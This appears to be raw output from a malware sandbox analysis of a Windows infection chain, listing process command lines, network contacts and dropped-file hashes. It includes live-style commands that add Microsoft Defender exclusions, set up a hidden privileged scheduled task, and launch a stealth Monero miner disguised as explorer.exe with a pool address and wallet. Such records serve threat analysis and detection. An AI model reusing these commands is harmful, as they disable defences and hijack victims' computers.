"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1036

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe

"C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4568 -ip 4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 968

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1080

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1292

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1512

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.listincode.com udp
NL 216.58.208.110:80 www.google-analytics.com tcp
US 103.224.182.208:443 www.listincode.com tcp
US 8.8.8.8:53 v.xyzgamev.com udp
US 104.21.40.196:443 v.xyzgamev.com tcp
US 8.8.8.8:53 files.fastbestapp.com udp
US 104.21.60.62:443 files.fastbestapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 presstheme.me udp
US 172.67.201.63:443 presstheme.me tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 cleanpcsoft.com udp
US 198.54.115.119:443 cleanpcsoft.com tcp
US 198.54.115.119:443 cleanpcsoft.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 198.54.115.119:443 cleanpcsoft.com tcp
US 20.189.173.4:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 104.21.60.62:443 files.fastbestapp.com tcp
US 103.224.182.208:443 www.listincode.com tcp
US 8.8.8.8:53 ww38.listincode.com udp
US 75.2.120.224:80 ww38.listincode.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
FR 2.18.109.224:443 tcp
US 8.8.8.8:53 appwebstat.biz udp
NL 216.58.208.110:80 www.google-analytics.com tcp
US 8.8.8.8:53 ads-memory.biz udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 104.20.68.143:443 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
FR 151.80.144.188:14433 xmr-eu2.nanopool.org tcp
FR 151.80.144.188:14433 xmr-eu2.nanopool.org tcp
FR 151.80.144.188:14433 xmr-eu2.nanopool.org tcp
FR 151.80.144.188:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 ads-memory.biz udp

Files

memory/1444-130-0x0000000000540000-0x00000000009B8000-memory.dmp

memory/612-131-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

memory/612-134-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/612-135-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/1644-136-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

C:\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

memory/2084-139-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 6454c263dc5ab402301309ca8f8692e0
SHA1 3c873bef2db3b844dc331fad7a2f20a1f0559759
SHA256 3f933885b67817db600687b4f59a67901f3d25d4e5fffd15ead10b356b43ad5e
SHA512 db9f4e73fcc73eb6d9adae1a2658d9c0f07da126a1d989cd4aa33f42ceb7c182bc97fb76f9d8ac3689c7c94027216b37326036f16a015ca1ba524dad59e4e8e9

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 6454c263dc5ab402301309ca8f8692e0
SHA1 3c873bef2db3b844dc331fad7a2f20a1f0559759
SHA256 3f933885b67817db600687b4f59a67901f3d25d4e5fffd15ead10b356b43ad5e
SHA512 db9f4e73fcc73eb6d9adae1a2658d9c0f07da126a1d989cd4aa33f42ceb7c182bc97fb76f9d8ac3689c7c94027216b37326036f16a015ca1ba524dad59e4e8e9

memory/612-142-0x00000000021F0000-0x0000000002208000-memory.dmp

memory/4568-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cb696bd52785bb4b873a5c3a7b681778
SHA1 4053f0ba7eafd38693f940a05ed4574f44a212ce
SHA256 d6b196e8c620269c3a0599ea5c7128269443e372c14f93c31b60503e4ce7db9d
SHA512 d54fd2f0d542dc92cbd5fcd4c792d9709d6fd1c595dce3ac0ad498759d218f73207b125c6ffb8c890b6ab03dbe724fefbc079cf6d306b004fed822778cafa2b3

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cb696bd52785bb4b873a5c3a7b681778
SHA1 4053f0ba7eafd38693f940a05ed4574f44a212ce
SHA256 d6b196e8c620269c3a0599ea5c7128269443e372c14f93c31b60503e4ce7db9d
SHA512 d54fd2f0d542dc92cbd5fcd4c792d9709d6fd1c595dce3ac0ad498759d218f73207b125c6ffb8c890b6ab03dbe724fefbc079cf6d306b004fed822778cafa2b3

memory/2084-151-0x0000000000580000-0x0000000000590000-memory.dmp

memory/2084-152-0x00000000007D0000-0x00000000007E3000-memory.dmp

memory/4332-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

MD5 71d7d7d75e1907f03f46470212981361
SHA1 8ec2e0ab43842c86fdcdb1e43211b538d0a7b55a
SHA256 0e03a756be893248f900805f78517d69b8281d8aa94dd25e219ea008e8bade74
SHA512 5f07aa4f15babb0a3922eae56cfe46d2e726e3f6a6bd197ddaa77d045e79a7f95442049b9a3107891e73ae4455275cb376ecda8befd1b1422c0121db4f07a305

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

MD5 71d7d7d75e1907f03f46470212981361
SHA1 8ec2e0ab43842c86fdcdb1e43211b538d0a7b55a
SHA256 0e03a756be893248f900805f78517d69b8281d8aa94dd25e219ea008e8bade74
SHA512 5f07aa4f15babb0a3922eae56cfe46d2e726e3f6a6bd197ddaa77d045e79a7f95442049b9a3107891e73ae4455275cb376ecda8befd1b1422c0121db4f07a305

memory/612-156-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/612-157-0x0000000002220000-0x0000000002259000-memory.dmp

memory/3316-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

MD5 92b56a901a8e317245d1655156b0aa11
SHA1 5a944171891dd0e94857f9f76bedb0459a76dccd
SHA256 8f001dfd8f37c5c957aebd56f83a8081a56585eae52f0aa9ca2714409c03d999
SHA512 4202ff9f62743a48ebca081f51780fb5c46e69e0ac190f4c471672a452305a8f9077e44beff3b44624c02c6ffde5fd3fbc6a25ae1d66bf4233c8098b1f5635b6

memory/2104-160-0x0000000000000000-mapping.dmp

memory/1340-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

MD5 20891e0a01056dd43ae77ba6d037549e
SHA1 9dcee5876aaccca6f2d377080a464fae3b85fb96
SHA256 d2322fc880f31e3f9c1f76fcac8ca3048e565039a9a4352a09a7081ef3ebe1ec
SHA512 1fecd44c1b4f1e9ff137747d382427767dd059dd81d470d8b3304ae987a2d22a4a98700d27a551c4c13aecab5a853e4ef03ed6b419d5ee6cd7c24193538f6ed5

C:\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

MD5 92b56a901a8e317245d1655156b0aa11
SHA1 5a944171891dd0e94857f9f76bedb0459a76dccd
SHA256 8f001dfd8f37c5c957aebd56f83a8081a56585eae52f0aa9ca2714409c03d999
SHA512 4202ff9f62743a48ebca081f51780fb5c46e69e0ac190f4c471672a452305a8f9077e44beff3b44624c02c6ffde5fd3fbc6a25ae1d66bf4233c8098b1f5635b6

memory/5028-164-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nstF7F2.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\nstF7F2.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

MD5 a37a675a8295d236cfac03f3edd4a3f2
SHA1 747fd82d2cf6858dca46ab57f996b17804731101
SHA256 12fa1a9cf6a062fdae368819bd1daab1317348b2bb8b255036f8b4d66d499f39
SHA512 f7a53fc66ed9b2af9803ee86b6e848b2414bcad27f319f7e9998b6ccae8fedd3b73a9b47a8c20fdbc447fa368774dcd2f52421b344fc6138a01b39b5792d1b69

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

MD5 20891e0a01056dd43ae77ba6d037549e
SHA1 9dcee5876aaccca6f2d377080a464fae3b85fb96
SHA256 d2322fc880f31e3f9c1f76fcac8ca3048e565039a9a4352a09a7081ef3ebe1ec
SHA512 1fecd44c1b4f1e9ff137747d382427767dd059dd81d470d8b3304ae987a2d22a4a98700d27a551c4c13aecab5a853e4ef03ed6b419d5ee6cd7c24193538f6ed5

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

MD5 c1842a8b51b5c04c57ac3e26cf7f8803
SHA1 2d2be700c6d60cabb8fd1c386d30b663a94fe57a
SHA256 c901a67e085946e2b7bdef83b94d3dc1da2f02e049b7af05018d5e48bcd08cd8
SHA512 0490e3380e53437f8193971230b5664a752b33fdc1c2e00e53cca47b9e78a8d4f7a6d28d0751f2dc594d84f105f3cd6abe0b8f51762e40176443748dd10711ff

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

MD5 d3128e4df693c5084e7d4ee8f0d8a28c
SHA1 84a526a23cf7637e52f3e993583789d5b7786be7
SHA256 8c1de8d3475a3a1ebcf9fe49540b638452454fb04d477f14ed1b8389dfebb297
SHA512 44301a1807ec9ee02ed72afb3eddc8a11ba729e8ec57f0dc143ed0d5bff597d2c0abd2b66abd2afb928f6e09b4ed7be258255282d5040e14eead641e1e2f954b

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

MD5 1c1c1a036ba9fd42f0934699b72b69a7
SHA1 2737478c4339e96f24b8f398cb915c6fd6175a70
